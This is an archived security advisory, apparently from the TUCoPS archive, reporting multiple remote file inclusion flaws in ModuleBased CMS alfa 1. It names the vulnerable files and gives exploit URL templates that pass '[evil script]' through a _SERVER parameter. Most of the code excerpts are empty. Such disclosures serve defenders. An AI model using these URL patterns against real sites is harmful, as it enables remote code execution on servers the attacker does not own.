TUCoPS :: Web :: CMS / Portals :: b06-4526.htm

ModuleBased CMS alfa 1 Multiple Remote File Inclusion
ModuleBased CMS alfa 1 Multiple Remote File Inclusion
ModuleBased CMS alfa 1 Multiple Remote File Inclusion


+ModuleBased CMS(MBCMS) multiple remote file Inclusion=0D
+discripton:MBCMS (ModuleBased CMS) is a new CMS designed for ease of use and customability. It is designed +for PHP/MySQL and it is easy to write new modules or templates to suit a particular website. =0D
+version:alfa 1=0D
+vendor site:http://sourceforge.net/projects/mbcms/=0D 
+=0D
+discovered by: ScorpinO=0D
+location:IRAN/ANZALI=0D
+sites: WwW.ScorpinO.NeT Www.deltahacking.iR=0D 
+email:amir.scorpino@yahoo.com=0D 
+special tnx to:Dr.trojan,HIV++,D_7J,Vampire,......=0D
+=0D
+discovered in avatar.php  archive.class.php  login.php  profile.class.php   process.php=0D
+=0D
+=0D
/admin/avatar.php=0D
=0D
=0D
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++=0D
=0D
/libs/archive.class.php=0D
=0D
		=0D
=0D
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++=0D
/libs/login.php=0D
=0D
login($_POST['username'], $_POST['pass']);=0D
	}=0D
?>=0D
=0D
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++=0D
/libs/profiles.class.php=0D
=0D
=0D
=0D
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++=0D
/libs/profile/proccess.php=0D
=0D
=0D
=0D
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++=0D
+exploit:=0D
+=0D
+http://www.example.com/[mbcms]/admin/avatar.php?_SERVER=[evil script]=0D 
+http://www.example.com/[mbcms]/libs/archive.class.php?_SERVER=[evil script]=0D 
+http://www.example.com/[mbcms]/libs/login.php?_SERVER=[evil script]=0D 
+http://www.example.com/[mbcms]/libs/profile.class.php?_SERVER=[evil script]=0D 
+http://www.example.com/[mbcms]/libs/profile/process.php?_SERVER=[evil script]=0D 
=0D
++=0D
=0D

TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2024 AOH